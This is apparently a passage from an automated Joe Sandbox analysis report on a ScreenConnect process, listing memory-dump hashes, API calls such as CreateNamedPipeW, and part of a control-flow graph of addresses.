                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D81112B1C002598FCB20CF9AD844BEEFBF4FB48324F14846AE459A7240D779A549CFA5
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: ef63cad69227f2c3b06f470bbbe11670be667cc918b317735cc7efb7a5836000
                                                                                                                                                                                                                  • Instruction ID: e4eda1d608dd3ae285eea7a28089f315ef73313dc0d757d9f08e5ffb3b72a373
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef63cad69227f2c3b06f470bbbe11670be667cc918b317735cc7efb7a5836000
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0213371904280DFCB01DF58D9C4B27BF65FBD8314F60C16AE8094B266C33AD496CAA1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                  • Instruction ID: 89b22454263a4b682fc6f2affc044aec8c151f21b93dc4ab601e86b018b775e2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11B176904280CFDB16CF54D9C4B16BF71FB94314F24C5AAD9090B266C33AD45ACBA2
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 2b2b81b9f2d54dc200c76fde55bfe4a9d95ce7fcc891d384ac32a5da94fee3de
                                                                                                                                                                                                                  • Instruction ID: 9d56d14fcaa383df81a5e3139163796d7f24d6f810c516fb9f1b21428e3456e7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b2b81b9f2d54dc200c76fde55bfe4a9d95ce7fcc891d384ac32a5da94fee3de
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A01407140D3C09FD7128B258894752BFB4EF43224F19C1DBE9888F2A7C2799849C772
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 04c2db420f47c318c5b6eaff5b42d4014e01bc918e31f421face760dd4f28eba
                                                                                                                                                                                                                  • Instruction ID: f0212826f69cd4551003bf940b3e9d4f3bf75a4e6bdb1159632770ccff66a21d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04c2db420f47c318c5b6eaff5b42d4014e01bc918e31f421face760dd4f28eba
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01F7B18083109AE7104A69CD84767FF98EF413A8F08C56BED584A2B6C27DD886C6B1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6ed82f21ad8a9f277f4004b72e80dc4e173ff398c7094b7fd602f6252c4db7c2
                                                                                                                                                                                                                  • Instruction ID: 08a75f01d17a6fb104ef7b4ec3423bbc31c99ac7797d1bb8b2d3e986bafcf5ea
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed82f21ad8a9f277f4004b72e80dc4e173ff398c7094b7fd602f6252c4db7c2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F054323002145F8710DA6DE844D5BBBEAEF896A0750852AF419C7354DB71ED4587A0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 78f34d9a37a7553e223de0593d6bcc02e40a231a275cf0496668df9fe659fae9
                                                                                                                                                                                                                  • Instruction ID: 68f4224fbc729f5928bb9906414dfd49dcd892b842aa422ada77d950b08595f0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78f34d9a37a7553e223de0593d6bcc02e40a231a275cf0496668df9fe659fae9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E0E521300112AB4604767EA44887FB6DBDFE95707A0833EE12ADB3D4DE24DC0543A5
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: afd0a2d0a52cffb44e7864040ae686151b77dd4363b5d52d1f29f634bc91f214
                                                                                                                                                                                                                  • Instruction ID: a3ab0bdfcbbff07adae57894083275a688051f5253b6388d15bcae8e8d1c8fc1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afd0a2d0a52cffb44e7864040ae686151b77dd4363b5d52d1f29f634bc91f214
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E092373001145F8304AB7EA4008ABBB9AAFE5770318803BE68587355DD31DC01D3A0
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 109501ece3e18c269e58e07650298fe7127e7fcf7e8eb5a1b543274c9fb616bc
                                                                                                                                                                                                                  • Instruction ID: a857ba81bb14204750c77b912bc908f5b67d7b672e9be9ab3f9135ae79a8a0af
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 109501ece3e18c269e58e07650298fe7127e7fcf7e8eb5a1b543274c9fb616bc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFC09276180208EFC700DF59D844C857BB8EF2977170140A1FA088B332C732ECA1DA94
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$*n
                                                                                                                                                                                                                  • API String ID: 0-427385658
                                                                                                                                                                                                                  • Opcode ID: 20fc106b4cf6de9d067be5d1519ad97a709cbc57d305ac3e344a5192a9d970ff
                                                                                                                                                                                                                  • Instruction ID: ee2a5b27ec59478657863e7f53b87311fe27a7e0253218db1b6b691cc7829d11
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20fc106b4cf6de9d067be5d1519ad97a709cbc57d305ac3e344a5192a9d970ff
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6A1D0706007418FD715EF79D55028DBBF2FF99604B408A6EC046AB36ADB78FC498BA4
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$*n
                                                                                                                                                                                                                  • API String ID: 0-427385658
                                                                                                                                                                                                                  • Opcode ID: 062e14aa1378ed1546af32eb8cb702e8130c7ab523d59e6d4ab28a1829d8692f
                                                                                                                                                                                                                  • Instruction ID: 4901daaa129f2e2a81444e79104cc30368a98b9e8e1402c53d2da44369e17de7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 062e14aa1378ed1546af32eb8cb702e8130c7ab523d59e6d4ab28a1829d8692f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F91C3706007029FD715EF79D54069EBBF2FF98700B508A2DC049AB369DB78F9488BA4
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$*n
                                                                                                                                                                                                                  • API String ID: 0-427385658
                                                                                                                                                                                                                  • Opcode ID: da5837ada57e2896b0b44e3a1c31d781df6d49deb28650c1568aaa854b011c41
                                                                                                                                                                                                                  • Instruction ID: a9b64ff3e978e5327f11054d702315ac70be9af60343259593d18f848a81be93
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da5837ada57e2896b0b44e3a1c31d781df6d49deb28650c1568aaa854b011c41
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1181A2706006029FD715EF79D54069EFBF2FF98704B508A2DC049AB368DB78F9488BA4
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlGetVersion.NTDLL(0000009C), ref: 01CE4DBE
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2961462272.0000000001CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1ce0000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                  • String ID: $;#$$;#$`Qkq
                                                                                                                                                                                                                  • API String ID: 1889659487-1160251708
                                                                                                                                                                                                                  • Opcode ID: 59aa2017a66d1aa9b80a3028c80afc5debf691036e4602d01da9aa1a0894daff
                                                                                                                                                                                                                  • Instruction ID: da576d9aec33d2c06db91e703c5782da60855c7c1ce6603ff0325e247463ba82
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59aa2017a66d1aa9b80a3028c80afc5debf691036e4602d01da9aa1a0894daff
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59212870901269DFEB64CF19D844B99FBB9FB08314F1082D9E50CA7650C775AA98CF92

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:11.5%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:37.5%
                                                                                                                                                                                                                  Total number of Nodes:8
                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                  execution_graph 12520 7ffd9b878014 12522 7ffd9b87801d 12520->12522 12521 7ffd9b878082 12522->12521 12523 7ffd9b8780f6 SetProcessMitigationPolicy 12522->12523 12524 7ffd9b878152 12523->12524 12525 7ffd9b873642 12526 7ffd9b896040 CreateNamedPipeW 12525->12526 12528 7ffd9b896173 12526->12528
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: 21afa1e750a6e2c14c04c23bf2fab9da677f719aa982b0949cfb61a890750af5
                                                                                                                                                                                                                  • Instruction ID: 96cf1cb5941b073ca678530274f205e5a311b9caf0a7bd0c1f02f880fd9332b7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21afa1e750a6e2c14c04c23bf2fab9da677f719aa982b0949cfb61a890750af5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5820831B0EE4E4BE7B8AB6894756B973D2FF98348F55007AD45EC71E6DD38A9018340
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: 249a64748ea089cbc5528180db3f62e3964920940df6a1b2fd06548936df1d6b
                                                                                                                                                                                                                  • Instruction ID: 21d05652c723fbe0684b3913c6402bf8da1740f339621e99bfa933491612dfe7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 249a64748ea089cbc5528180db3f62e3964920940df6a1b2fd06548936df1d6b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0E1CB31B0AD4F4AFB759BA884746F962D2FF98348F560079D44EC72E6DD38BA068341

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 744 7ffd9b873642-7ffd9b8960aa 747 7ffd9b8960ac-7ffd9b8960b1 744->747 748 7ffd9b8960b4-7ffd9b896171 CreateNamedPipeW 744->748 747->748 750 7ffd9b896179-7ffd9b8961ac 748->750 751 7ffd9b896173 748->751 751->750
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2975394190.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9b870000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateNamedPipe
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2489174969-0
                                                                                                                                                                                                                  • Opcode ID: ad90d78e41d3b3bb54b71475a344551e36c3e53b39a44b7b46044c71b2ccb0a2
                                                                                                                                                                                                                  • Instruction ID: 7e87d0b9ed88e7cb8e13e4b814c3fcad9adef7858975288ef603fcd01892f5f6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad90d78e41d3b3bb54b71475a344551e36c3e53b39a44b7b46044c71b2ccb0a2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9451A17191CA1C8FDB68DF5CA845BE9BBE0FB59720F1442AEE04DE3251CB70A9418BC1

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 954 7ffd9bb863c2-7ffd9bb863c9 955 7ffd9bb863cb-7ffd9bb863e8 call 7ffd9bb85450 954->955 956 7ffd9bb86428-7ffd9bb8649a 954->956 963 7ffd9bb863ee-7ffd9bb86401 955->963 964 7ffd9bb85dfb-7ffd9bb85e04 955->964 970 7ffd9bb864a0-7ffd9bb864be call 7ffd9bb806a0 * 2 956->970 971 7ffd9bb868a8-7ffd9bb868c6 call 7ffd9bb806a0 * 2 956->971 964->954 982 7ffd9bb864c4-7ffd9bb864cc 970->982 983 7ffd9bb8673e-7ffd9bb8675c call 7ffd9bb806a0 * 2 970->983 980 7ffd9bb869d2-7ffd9bb869dd 971->980 981 7ffd9bb868cc-7ffd9bb868d3 971->981 984 7ffd9bb868e6-7ffd9bb868e8 981->984 985 7ffd9bb868d5-7ffd9bb868e4 981->985 987 7ffd9bb864d3-7ffd9bb864d6 982->987 999 7ffd9bb8675e-7ffd9bb86768 983->999 1000 7ffd9bb86786-7ffd9bb867a4 call 7ffd9bb806a0 * 2 983->1000 988 7ffd9bb868ef-7ffd9bb86913 984->988 985->984 994 7ffd9bb868ea 985->994 991 7ffd9bb864dc-7ffd9bb864ea 987->991 992 7ffd9bb864d8-7ffd9bb864da 987->992 1001 7ffd9bb8695f-7ffd9bb8698f 988->1001 1002 7ffd9bb86915-7ffd9bb86932 988->1002 995 7ffd9bb864ed-7ffd9bb86502 991->995 992->995 994->988 1011 7ffd9bb86504-7ffd9bb86506 995->1011 1012 7ffd9bb86508-7ffd9bb8652c call 7ffd9bb85560 * 2 995->1012 1005 7ffd9bb8677c 999->1005 1006 7ffd9bb8676a-7ffd9bb8677a 999->1006 1024 7ffd9bb8685b 1000->1024 1025 7ffd9bb867aa-7ffd9bb867b5 1000->1025 1032 7ffd9bb86991-7ffd9bb86993 1001->1032 1033 7ffd9bb86995-7ffd9bb869a4 1001->1033 1013 7ffd9bb869de-7ffd9bb86a57 1002->1013 1014 7ffd9bb86938-7ffd9bb8695d 1002->1014 1009 7ffd9bb8677e-7ffd9bb8677f 1005->1009 1006->1009 1009->1000 1018 7ffd9bb8652f-7ffd9bb86544 1011->1018 1012->1018 1040 7ffd9bb86aa0-7ffd9bb86af6 1013->1040 1041 7ffd9bb86a59-7ffd9bb86a8f 1013->1041 1014->1001 1036 7ffd9bb8654a-7ffd9bb8656e call 7ffd9bb85560 * 2 1018->1036 1037 7ffd9bb86546-7ffd9bb86548 1018->1037 1031 7ffd9bb8685c-7ffd9bb86866 1024->1031 1045 7ffd9bb867bb-7ffd9bb867ca 1025->1045 1046 7ffd9bb867b7-7ffd9bb867b9 1025->1046 1055 7ffd9bb8686c-7ffd9bb8687b 1031->1055 1056 7ffd9bb86868-7ffd9bb8686a 1031->1056 1042 7ffd9bb869a7-7ffd9bb869ae 1032->1042 1033->1042 1044 7ffd9bb86571-7ffd9bb86586 1036->1044 1037->1044 1074 7ffd9bb86afc-7ffd9bb86b20 1040->1074 1075 7ffd9bb86af8-7ffd9bb86af9 1040->1075 1098 7ffd9bb86a94 1041->1098 1099 7ffd9bb86a91 1041->1099 1049 7ffd9bb869c3-7ffd9bb869c4 1042->1049 1050 7ffd9bb869b0-7ffd9bb869c1 1042->1050 1060 7ffd9bb8658c-7ffd9bb865b0 call 7ffd9bb85560 1044->1060 1061 7ffd9bb86588-7ffd9bb8658a 1044->1061 1054 7ffd9bb867cd-7ffd9bb867fd 1045->1054 1046->1054 1052 7ffd9bb869c6-7ffd9bb869cb 1049->1052 1050->1052 1052->980 1054->1031 1071 7ffd9bb867ff-7ffd9bb86801 1054->1071 1064 7ffd9bb8687e-7ffd9bb86880 1055->1064 1056->1064 1070 7ffd9bb865b3-7ffd9bb865c1 1060->1070 1061->1070 1064->980 1073 7ffd9bb86886-7ffd9bb86894 1064->1073 1087 7ffd9bb865c3-7ffd9bb865c5 1070->1087 1088 7ffd9bb865c7-7ffd9bb865d5 1070->1088 1071->1024 1077 7ffd9bb86803-7ffd9bb86808 1071->1077 1078 7ffd9bb86896-7ffd9bb86898 1073->1078 1094 7ffd9bb86b52-7ffd9bb86b5b 1074->1094 1095 7ffd9bb86b22-7ffd9bb86b31 1074->1095 1075->1074 1082 7ffd9bb8680b-7ffd9bb86811 1077->1082 1083 7ffd9bb86884-7ffd9bb86894 1078->1083 1084 7ffd9bb86898 1078->1084 1089 7ffd9bb86824-7ffd9bb8682c 1082->1089 1090 7ffd9bb86813-7ffd9bb8681b 1082->1090 1083->1078 1084->1083 1084->1084 1096 7ffd9bb865d8-7ffd9bb865e1 1087->1096 1088->1096 1092 7ffd9bb8683e 1089->1092 1093 7ffd9bb8682d-7ffd9bb8682e 1089->1093 1090->1093 1097 7ffd9bb8681d-7ffd9bb86822 1090->1097 1103 7ffd9bb86844-7ffd9bb86859 1092->1103 1102 7ffd9bb86833-7ffd9bb8683d call 7ffd9bb85598 1093->1102 1104 7ffd9bb86b33-7ffd9bb86b34 1095->1104 1105 7ffd9bb86b37-7ffd9bb86b51 1095->1105 1112 7ffd9bb865e8-7ffd9bb865ef 1096->1112 1097->1102 1100 7ffd9bb86a96-7ffd9bb86a9d 1098->1100 1099->1100 1110 7ffd9bb86a9e 1100->1110 1102->1103 1103->1024 1103->1082 1104->1105 1110->1110 1112->983 1114 7ffd9bb865f5-7ffd9bb865fc 1112->1114 1114->983 1115 7ffd9bb86602-7ffd9bb86619 1114->1115 1117 7ffd9bb8664e-7ffd9bb86659 1115->1117 1118 7ffd9bb8661b-7ffd9bb8662d 1115->1118 1123 7ffd9bb8665f-7ffd9bb8666e 1117->1123 1124 7ffd9bb8665b-7ffd9bb8665d 1117->1124 1121 7ffd9bb86633-7ffd9bb86641 1118->1121 1122 7ffd9bb8662f-7ffd9bb86631 1118->1122 1125 7ffd9bb86644-7ffd9bb86647 1121->1125 1122->1125 1126 7ffd9bb86671-7ffd9bb86673 1123->1126 1124->1126 1125->1117 1128 7ffd9bb86679-7ffd9bb86690 1126->1128 1129 7ffd9bb86728-7ffd9bb8673a 1126->1129 1128->1129 1133 7ffd9bb86696-7ffd9bb866b3 1128->1133 1129->983 1136 7ffd9bb866bf 1133->1136 1137 7ffd9bb866b5-7ffd9bb866bd 1133->1137 1138 7ffd9bb866c1-7ffd9bb866c3 1136->1138 1137->1138 1138->1129 1140 7ffd9bb866c5-7ffd9bb866cf 1138->1140 1141 7ffd9bb866d1-7ffd9bb866db call 7ffd9bb83748 1140->1141 1142 7ffd9bb866dd-7ffd9bb866e5 1140->1142 1141->983 1141->1142 1144 7ffd9bb86713-7ffd9bb86726 call 7ffd9bb85588 1142->1144 1145 7ffd9bb866e7-7ffd9bb8670c call 7ffd9bb85370 1142->1145 1144->983 1145->1144
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                  • Opcode ID: 2f02fa2d738769a605f87c6dfbd6688384c56d0687533305e5cf6c63aab07398
                                                                                                                                                                                                                  • Instruction ID: 4832c2daf5730dccbd7f3cfe72738bdfd583ba691ec15c65c3f07797c5d6c9cf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f02fa2d738769a605f87c6dfbd6688384c56d0687533305e5cf6c63aab07398
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53C1A431B0AE4F4AE7799BA484756F962D2FF94348F560039D44EC72E6DE39BA028241

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1152 7ffd9bb862e9-7ffd9bb862fc 1154 7ffd9bb86302-7ffd9bb86337 1152->1154 1155 7ffd9bb86438-7ffd9bb8649a 1152->1155 1154->1155 1164 7ffd9bb864a0-7ffd9bb864be call 7ffd9bb806a0 * 2 1155->1164 1165 7ffd9bb868a8-7ffd9bb868c6 call 7ffd9bb806a0 * 2 1155->1165 1176 7ffd9bb864c4-7ffd9bb864cc 1164->1176 1177 7ffd9bb8673e-7ffd9bb8675c call 7ffd9bb806a0 * 2 1164->1177 1174 7ffd9bb869d2-7ffd9bb869dd 1165->1174 1175 7ffd9bb868cc-7ffd9bb868d3 1165->1175 1178 7ffd9bb868e6-7ffd9bb868e8 1175->1178 1179 7ffd9bb868d5-7ffd9bb868e4 1175->1179 1181 7ffd9bb864d3-7ffd9bb864d6 1176->1181 1193 7ffd9bb8675e-7ffd9bb86768 1177->1193 1194 7ffd9bb86786-7ffd9bb867a4 call 7ffd9bb806a0 * 2 1177->1194 1182 7ffd9bb868ef-7ffd9bb86913 1178->1182 1179->1178 1188 7ffd9bb868ea 1179->1188 1185 7ffd9bb864dc-7ffd9bb864ea 1181->1185 1186 7ffd9bb864d8-7ffd9bb864da 1181->1186 1195 7ffd9bb8695f-7ffd9bb8698f 1182->1195 1196 7ffd9bb86915-7ffd9bb86932 1182->1196 1189 7ffd9bb864ed-7ffd9bb86502 1185->1189 1186->1189 1188->1182 1205 7ffd9bb86504-7ffd9bb86506 1189->1205 1206 7ffd9bb86508-7ffd9bb8652c call 7ffd9bb85560 * 2 1189->1206 1199 7ffd9bb8677c 1193->1199 1200 7ffd9bb8676a-7ffd9bb8677a 1193->1200 1218 7ffd9bb8685b 1194->1218 1219 7ffd9bb867aa-7ffd9bb867b5 1194->1219 1226 7ffd9bb86991-7ffd9bb86993 1195->1226 1227 7ffd9bb86995-7ffd9bb869a4 1195->1227 1207 7ffd9bb869de-7ffd9bb86a57 1196->1207 1208 7ffd9bb86938-7ffd9bb8695d 1196->1208 1203 7ffd9bb8677e-7ffd9bb8677f 1199->1203 1200->1203 1203->1194 1212 7ffd9bb8652f-7ffd9bb86544 1205->1212 1206->1212 1234 7ffd9bb86aa0-7ffd9bb86af6 1207->1234 1235 7ffd9bb86a59-7ffd9bb86a8f 1207->1235 1208->1195 1230 7ffd9bb8654a-7ffd9bb8656e call 7ffd9bb85560 * 2 1212->1230 1231 7ffd9bb86546-7ffd9bb86548 1212->1231 1225 7ffd9bb8685c-7ffd9bb86866 1218->1225 1239 7ffd9bb867bb-7ffd9bb867ca 1219->1239 1240 7ffd9bb867b7-7ffd9bb867b9 1219->1240 1249 7ffd9bb8686c-7ffd9bb8687b 1225->1249 1250 7ffd9bb86868-7ffd9bb8686a 1225->1250 1236 7ffd9bb869a7-7ffd9bb869ae 1226->1236 1227->1236 1238 7ffd9bb86571-7ffd9bb86586 1230->1238 1231->1238 1268 7ffd9bb86afc-7ffd9bb86b20 1234->1268 1269 7ffd9bb86af8-7ffd9bb86af9 1234->1269 1292 7ffd9bb86a94 1235->1292 1293 7ffd9bb86a91 1235->1293 1243 7ffd9bb869c3-7ffd9bb869c4 1236->1243 1244 7ffd9bb869b0-7ffd9bb869c1 1236->1244 1254 7ffd9bb8658c-7ffd9bb865b0 call 7ffd9bb85560 1238->1254 1255 7ffd9bb86588-7ffd9bb8658a 